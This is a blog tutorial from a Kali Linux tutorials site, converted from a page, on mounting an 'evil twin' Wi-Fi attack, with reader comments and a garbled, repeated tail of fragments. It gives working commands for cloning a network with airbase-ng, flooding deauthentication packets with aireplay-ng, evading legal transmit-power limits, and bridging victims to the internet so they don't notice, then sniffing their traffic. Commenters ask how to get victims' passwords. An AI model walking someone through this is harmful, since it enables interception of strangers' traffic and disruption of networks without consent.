Evil Twin

 GENERAL  WIRELESS  PENTESTING  WEB HACKING  KALI LINUX 
STARTERS GUIDE
Evil Twin Tutorial
Prerequisites
1. Kali Linux
2. Prior experience with wireless hacking
open in browser PRO version Are you a developer? Try out the HTML to PDF API pdfcrowd.com
You will also need to install a tool (bridge utils)
which doesn't come pre-installed in Kali. No big
deal-
apt-get install bridge-utils
Objectives
The whole process can be broken down into the following steps-
1. Finding out about the access point (AP) you want to imitate, and then actually imitating it
(i.e. creating another access point with the same SSID and everything). We'll use airmon-
ng for finding necessary info about the network, and airbase-ng to create it's twin.
2. Forcing the client to disconnect from the real AP and connecting to yours. We'll use
aireplay-ng to deauthenticate the client, and strong signal strength to make it connect to
our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That basically means
that we have to provide internet access to our client after he has connected to the fake
wireless network. For that we will need to have internet access ourselves, which can be
routed to out client.
4. Have fun - monitor traffic from the client, maybe hack into his computer using metasploit.
PS: The first 3 are primary objectives, the last one is optional and not a part of evil twin attack
as such. It is rather a man in the middle attack. Picture credits : firewalls.com
WAN Optimizer
Boost Speed & Save costs. WAN Compression on the fly.
Information Gathering - airmon-ng
To see available wireless interfaces-
iwconfig
To start monitor mode on the available wireless interface (say wlan0)-

airmon-ng start wlan0
To capture packets from the air on monitor mode interface (mon0)

airodump-ng mon0
After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.
Creating the twin
Now we will use airbase-ng to create the twin network of one of the networks that showed up in
the airodump-ng list. Remember, you need to have a client connected to the network (this
client will be forced to disconnect from that network and connect to ours), so choose the
network accordingly. Now after you have selected the network, take a note of it's ESSID and
BSSID. Replace them in given code-
airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>
If you face any problems, a shorter code will be-

airbase-ng --essid <name of network> mon0
Remove the angular brackets (< & >) and choose

any channel that you want. Also, the BSSID can be
randomly selected too, and doesn't have to match
with the target. The interface would be mon0 (or
whatever is the card you want to use) . The only
thing identical about the twins has to be their
ESSIDs (which is the name of the network). However, it is better to keep all parameters same to
make it look more real. After you are done entering the parameters and running the command,
you'll see that airbase turned your wireless adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure you have
Note : We will need to provide internet access to our client at a later stage. Make sure you have
a method of connecting to the net other than wireless internet, because your card will be busy
acting like an AP, and won't be able to provide you with internet connectivity. So, either you
need another card, or broadband/ADSL/3G/4G/2G internet.
Telling the client to get lost

Now we have to ask the client to disconnect from
that AP. Our twin won't work if the client is
connected to the other network. We need to
force it to disconnect from the real network and
connect to the twin.
For this, the first part is to force it to disconnect.
Aireplay will do that for us-
Man in the middle attack : Pic Credits: owasp.net
aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one
The 0 species the time internal at which to send

the deauth request. 0 means extremely fast, 1
would mean send a packet every 1 seconds, 2
would mean a packet every 2 seconds, and so on.
If you keep it as 0, then your client would be disconnected in a matter of seconds, so fire up the
command, and press ctrl+c after a few seconds only. Note that the deauth is sent on
broadcast, so all the clients (not just one) connected to the network will disconnect.
Disconnecting a specific client is also possible.
Not the real one, but why the fake one
Even after being disconnected from the real AP, the client may choose to keep trying to
connect to the same AP a few more times, instead of trying to connect to ours. We need to
make our AP stand out, and for that, we need more signal strength. There are 2 ways to do
that-
1. Physically move closer to the client.

2. Power up your wireless card to transmit at more power.
The latter can be done with the following command -

iwconfig wlan0 txpower 27
Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some
can transmit at extremely high power. Alfa cards usually support upto 30dBm, but many
countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see
what I mean. In Bolivia, however, you can transmit at 30dBm, and by changing the regulatory
domain, we can overcome the power limitation.
iw reg set BO
iwconfig wlan0 txpower 30
It is strongly advised to not break laws as the transmission limits are there for a reason, and
very high power can be harmful to health (I have no experimental evidence). Nevertheless, the
client should connect to you if your signal strength is stronger than that you the real twin.
Note : If you are unable to get your client to connect to you, there is another option. You
Note : If you are unable to get your client to connect to you, there is another option. You
can leave him with no options. If you keep transmitting the deauth packets continuously
(i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to
connect to you. However, this is quite an unstable situation, and the client will go back to
the real twin as soon as it gets the chance.
Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways. In this
tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if
you are connected to net via wireless, replace x0 with wlan1 or wlan0, a 3G modem will show up
as ppp0. Nevertheless, you just have to know which interface is providing you with internet, and
you can route the internet access to your client.
Interfaces
x0 - This has internet access
at0 - This is create by airbase-ng (wired face of the wireless access point). If you can
somehow give internet access to at0, then the clients connected to your fake
wireless network can connect to the net.
evil - This is an interface that we will create, whose job will be to actually bridge the
networks.
Creating evil
We will use Bridge control utility provided by Kali, brctl. Execute the following code-
brctl addbr evil
This will create the bridge. Now we have to specify which two interfaces have to be bridged-
brctl addif evil x0
brctl addif evil at0
We can assign an IP to the interfaces and bring them up using-

ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
Also bring up the evil interface (the interfaces aren't always up by default so we have to do this
many times)
ifconfig evil up
Now to auto configure all the complicated DHCP settings, we'll use dhclient
dhclient3 evil &
Finally, all the configurations have been completed. You can execute ifconfig and see the
results, which will show you all the interfaces you have created.
Officially, the evil twin attack is complete. The client is now connected to your fake network, and
can use the internet pretty easily. He will not have any way to find out what went wrong.
However, the last objective remains.
Have fun
Now that the client is using the internet via our evil interface, we can do some evil stuff. This
actually comes under a Man In The Middle attack (MITM), and I'll write a detailed tutorial for it
later. However, for the time being, I will give you some idea what you can do.
Sniffing using Wireshark
Sniffing using Wireshark
Now all the packets that go from the user to the
internet pass through out evil interface, and these
packets can be monitored via wireshark. I won't
teach you how to use it here, since it is a GUI tool.
You can take a look at their website to get an idea
on how to use wireshark. Pic credits: The picture
on the right has been directly taken from their
website.
http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html
Special Thanks
Matthew Bernard for his useful comment with some tips and a number of corrections
http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html?
showComment=1406591245609#c5539483407421385761
The screenshots have also been taken by him and provided to me for usage (I would love to see
more helpful visitors like him).
39 comments:
Anonymous July 16, 2014 at 2:04 AM
Hi,
thanks for this great Tutorial :)
Although it's easy to understand, I have some problems with it:
When I want to create the Fake-Network using
"airbase-ng -A -ESSID -c "
I get the message, that -ESSID is an invalid argument. When I use "--essid" instead, I get
"ioctl(SIOCGIFINDEX) failed: no such device".
I found out, that I'm only allowed to use a monitor of airmon-ng, but I thought, that's not what we want
to imitate another one's AP, especially access point's MAC.
Next Problem: Even when I use the mon created with airmon-ng (e.g. after Spoofing my own MAC with
ifconfig) the program begins to send beacons to a apparantly random Client and won't stop that until I
tipe Ctrl+C, so I'm not able to continue with the next step.
What am I doing wrong?
Reply
Replies
I have the same problem as the first guy who commented but when I
try airbase-ng -a -essid mon0 i get this:
root@kali:~# airbase-ng -a -essid ryanmatt mon0

Invalid AP MAC address.
"airbase-ng --help" for help.
But if I try to put the bssid after the -a then i get this:
root@kali:~# airbase-ng -a 00:26:F3:35:4D:31 -essid ryanmatt mon0

SHASHWAT CHAUDHARY July 28, 2014 at 8:36 PM
Sorry, replace -essid with --essid.
Anonymous July 20, 2014 at 3:17 PM
I really appreciate the time that went into this. As a beginner, this has been hugely helpful. Thanks!
Reply
Replies
SHASHWAT CHAUDHARY July 21, 2014 at 2:14 AM
Glad you found it useful.
Can we hack his wifi using evil twin method.....
Reply
Replies
SHASHWAT CHAUDHARY July 28, 2014 at 2:01 AM
We can, but it's kinda tricky. I will write on it after some time.
RAVI RAM July 27, 2014 at 12:51 PM
hey sashwat finally you are able to run adsense ads on your blog...congrats.
Reply
MATTHEW BARNARD July 28, 2014 at 4:50 PM
Sorry, actually .07mb/sec upload speed.
Reply
MATTHEW BARNARD July 29, 2014 at 5:45 PM
This comment has been removed by the author.
Reply
SHASHWAT CHAUDHARY July 29, 2014 at 10:21 PM
I will into those captcha related sources that you've listed. Also, I've sent you a mail.
Reply
CHROMIUMPT February 18, 2015 at 9:40 AM
Hi, i get the following error:
root@user:~# airbase-ng --essid Helder mon0

17:36:26 Created tap interface at0
17:36:26 Trying to set MTU on at0 to 1500
17:36:26 Trying to set MTU on mon0 to 1800
17:36:26 Access Point with BSSID 00:22:FB:88:A1:E8 started.
Error: Got channel -1, expected a value > 0.
could you pls help me, ty.
LOVE THIS SITE BTW ;)
Reply
Replies
SHASHWAT CHAUDHARY
February 18, 2015 at 8:46 PM
Try this
airbase-ng --essid Helder mon0 --ignore-negative-one
ty for the fast reply, unfortunately that didn't work. i got this error:
root@user:~# airbase-ng --essid Helder mon0 --ignore-negative-one
airbase-ng: unrecognized option '--ignore-negative-one'
SHASHWAT CHAUDHARY
My bad. --ignore-negative-one is not present in airbase-ng. The

solution is a bit longer here.
1) airmon-ng check kill - Kill the processes.

2) If you are running monitor mode on wlan0, then turn down that
interface using iwconfig wlan0 down (after turning on the monitor
mode on wlan0)
ty, that worked! :)
how do i connect to the internet later on now?
SHASHWAT CHAUDHARY
root@user:# /etc/init.d/networking start
This should start network manager again.
TEST TZTZ April 22, 2015 at 5:15 AM
Dear Shashwat,
I have the same problem as Chromiupt and I have tried to follow your
instructions but there is still problems for me...
Indeed, everything works well when NetworkManager is stopped but I
will need it after in order to give internet access to the client.
It seems that as soon as I start NetworkManager, mon0 is not

assigned anymore to any channel (I check with iwlist mon0 channel) so
the "channel -1" error appears. Doing "airmon-ng start wlan0 6" (6 the
channel I want mon0 to be assigned), assigned mon0 only if
NetworkManager is OFF. For Example, I tried to turn NetworkManager
off, assign mon0 (it works) then turn on NetworkManager on, and
then mon0 was not assigned anymore.
I saw that someone else had the same problem (Astenon at

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-creating-evil-
twin-wireless-access-point-eavesdrop-data-0147919/) but could not
solve it either.
Is there any solution ? Will I have to give internet by ethernet ?
Thanks a lot for your answer,
Robert
IINQ March 7, 2015 at 11:37 AM
Can somebody help me please?
cant bridge my interfaces...
brctl addif evil wlan0

cant add wlan0 to bridge evil: Operation not supported.
Thanks!
Reply
Replies
Anonymous March 28, 2015 at 10:49 AM
You'll need something else to connect to the internet, like a second
wireless card, because your wlan0 interface is already acting as an AP.
Anonymous April 18, 2015 at 1:01 PM
I'm having the same issue, but with wlan1, which is connected to the
Internet. Apparently bridging is not possible with some wireless cards:
http://www.reddit.com/r/linux/comments/o3ub0/brctl_equivalent_for
_wlan0/c3e54tz
Anonymous April 25, 2015 at 11:27 PM
wouldn't it be better to give evil internet access before sending the death packet?
Reply
Anonymous July 24, 2015 at 12:57 PM
After sending the deauth command my tablet gets disconnected from my router and tries to connect to
the evil twin but it never will. I just keeps scanning over and over. If I choose the connection manually it
trys to authenticate but never does it just shows the network as saved or turned off. Any ideas what to
do about this?
Reply
Replies
I was encountering the same problem earlier. Three things:
1: Are you providing internet access to evil interface? (Not sure if this
step is necessary but worked for me.)
2: Is the AP having same bssid and essid? And is it on same channel? If
not then make it identical.
3: Donot send deauth continuously. Press ctrl^c to stop deauthing and
then try to connect to the twin.
Hope it helped! :)
Anonymous
I am setting the evil bridge between eth0 and at0 interface. I have successfully established a connection
with a device after deauthing it. But after [dhclient evil &] command i am not able to connect to internet.
PS: ifconfig shows eth0 connected to router with ip 192.168.1.5
ato is at ip 172.168.1.0
Please help.
Reply
FILOGASBA August 26, 2015 at 1:26 AM
"iwconfig wlan0 txpower 30", but at default how high it is set?
If I set a value, at a reboot the value return at default?
Reply
UNKNOWN September 14, 2015 at 3:39 PM
So Can I Obtain The Wifi's Router Password Using This Method?
Reply
UNKNOWN October 21, 2015 at 1:19 AM
what ip address should we assign here after creating the bridge? Should i type "ifconfig at 0.0.0.0 up" and
"ifconfig eth0 0.0.0.0 up"? once i created the bridge i can no longer get out to the internet
Reply
Anonymous October 25, 2015 at 11:35 PM
For all of you having trouble with internet access after running
brctl addbr evil

brctl addif evil eth0
brctl addif evil at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig evil up
dhclient3 evil &
I found if I changed "dhclient3 evil &" to "dhclient evil &" it worked fine. ***remove quotes
Reply
Anonymous October 31, 2015 at 2:39 PM
It works great but after doing all this my wlan0 disappeared in my ifconfig.. there is only the evil left
Reply
Anonymous November 16, 2015 at 12:07 AM
how to see the victim's password?
Reply
Anonymous December 1, 2015 at 3:22 AM
somebody can tell me how to see the victim's password please
Reply
Anonymous December 15, 2015 at 1:25 AM
For testing purpose, I use two wifi cards in Desktop computer. Can I use the same AP Wifi(Internet
source-mobile phone) for victim client Internet and Desktop comp alternative Internet access, if
deauthenticate only selected victim client-not myself:) ?
Reply
TAYLOR HOUSTON December 16, 2015 at 3:35 PM
wouldn't it be better to bridge them first? That way the client will have internet access as soon as he
connects??
Reply
NEHAT KHAN December 24, 2015 at 9:37 AM
i am using kali in vmware and having wifi connection! so can you please tell me how to bridge the
network! it will be very helpful! thanks
Reply
outhman mdarhri January 22, 2016 at 9:39 AM
after doing all of that how we can crack the wpa 2 psk
and exploit the machine
Reply
PRIYANSU SAHOO January 22, 2016 at 9:58 AM
E: Unable to locate package error while installing package
Reply
Anonymous March 17, 2016 at 8:49 AM
You guys should probably try easycreds if u find the tutorial difficult to follow. It's automated
Reply
Enter your comment...
Comment as: Select profile...
Publish Preview
Search
Kali Tutorials
Kali Tutorials
4,254 likes
Like Page Use App
Be the first of your friends to like this
SPONSORED
POPULAR POSTS
Tutorial on Hacking With Kali Linux

Hacking With Kali Linux Why Kali Linux? With Kali Linux, hacking becomes much easier since
you have all the tools (more than 300 pre...
Hack WPA/WPA2 WPS - Reaver - Kali Linux
WPA/WPA-2 When it was known that a WEP network could be hacked by any kid with a laptop
and a network connection (using easy peasy tuto...
Wifi Hacking - WEP - Kali Linux Aircrack-ng suite

Alright, this post is written assuming you have Kali Linux up and running on your computer. If
not, here is a post on hacking with kali linu...
Penetration Testing - Hacking XP

Our approach to penetration testing is going to be simple. I already made a post about the
ideal way to begin penetration testing. But we ar...
Wifite : Hacking Wifi The Easy Way : Kali Linux

Wifite While the aircrack-ng suite is a well known name in the wireless hacking , the same can't
be said about Wifite. Living in th...
Hack WPA/WPA-2 PSK Capturing the Handshake

WPA password hacking Okay, so hacking WPA-2 PSK involves 2 main steps- Getting a
handshake (it contains the hash of password, i.e. enc...
Hack Facebook Account : Stuff You Should Know

Hack Facebook? Okay, so you got lured into the idea of hacking a Facebook account? I won't
ask why. Everyone has their reasons. If you...
ask why. Everyone has their reasons. If you...
Evil Twin Tutorial

Prerequisites Kali Linux Prior experience with wireless hacking You will also need to install a
tool (bridge utils) which doesn'...
Denial Of Service Attacks : Explained for Beginners and Dummies

Just like most other things associated with hacking, a denial of service attack is not everyone's
cup of tea. It, however, can be unders...
Hacking Website with Sqlmap in Kali Linux

A screenshot from the SQLmap official website In the previous tutorial, we hacked a website
using nothing but a simple browser on a Wind...
AUTHOR
Shashwat Chaudhary
google.com/+ShashwatChaudhary1
1st year CSE @ IIIT Delhi
Follow
707 followers

Evil Twin

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Evil Twin

Uploaded by

Copyright:

Available Formats

 GENERAL  WIRELESS  PENTESTING  WEB HACKING  KALI LINUX 

Evil Twin Tutorial

apt-get install bridge-utils

To start monitor mode on the available wireless interface (say wlan0)-

To capture packets from the air on monitor mode interface (mon0)

If you face any problems, a shorter code will be-

Remove the angular brackets (< & >) and choose

Telling the client to get lost

aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one

The 0 species the time internal at which to send

1. Physically move closer to the client.

The latter can be done with the following command -

iwconfig wlan0 txpower 30

Give the fake AP internet access

brctl addif evil at0

We can assign an IP to the interfaces and bring them up using-

ifconfig at0 0.0.0.0 up

Anonymous July 16, 2014 at 2:04 AM

What am I doing wrong?

Anonymous July 28, 2014 at 10:17 AM

root@kali:~# airbase-ng -a -essid ryanmatt mon0

root@kali:~# airbase-ng -a 00:26:F3:35:4D:31 -essid ryanmatt mon0

SHASHWAT CHAUDHARY July 28, 2014 at 8:36 PM

Sorry, replace -essid with --essid.

Anonymous July 20, 2014 at 3:17 PM

Glad you found it useful.

Anonymous July 27, 2014 at 8:57 AM

Can we hack his wifi using evil twin method.....

SHASHWAT CHAUDHARY July 28, 2014 at 2:01 AM

MATTHEW BARNARD July 28, 2014 at 4:50 PM

Sorry, actually .07mb/sec upload speed.

MATTHEW BARNARD July 29, 2014 at 5:45 PM

This comment has been removed by the author.

SHASHWAT CHAUDHARY July 29, 2014 at 10:21 PM

Hi, i get the following error:

root@user:~# airbase-ng --essid Helder mon0

could you pls help me, ty.

LOVE THIS SITE BTW ;)

My bad. --ignore-negative-one is not present in airbase-ng. The

1) airmon-ng check kill - Kill the processes.

ty, that worked! :)

CHROMIUMPT February 20, 2015 at 4:03 AM

how do i connect to the internet later on now?

root@user:# /etc/init.d/networking start

This should start network manager again.

It seems that as soon as I start NetworkManager, mon0 is not

I saw that someone else had the same problem (Astenon at

Is there any solution ? Will I have to give internet by ethernet ?

IINQ March 7, 2015 at 11:37 AM

Can somebody help me please?

cant bridge my interfaces...

brctl addif evil wlan0

Anonymous March 28, 2015 at 10:49 AM

Anonymous April 18, 2015 at 1:01 PM

Anonymous April 25, 2015 at 11:27 PM

Anonymous July 24, 2015 at 12:57 PM

Anonymous July 27, 2015 at 2:49 AM

I was encountering the same problem earlier. Three things:

FILOGASBA August 26, 2015 at 1:26 AM

"iwconfig wlan0 txpower 30", but at default how high it is set?

If I set a value, at a reboot the value return at default?

UNKNOWN September 14, 2015 at 3:39 PM

So Can I Obtain The Wifi's Router Password Using This Method?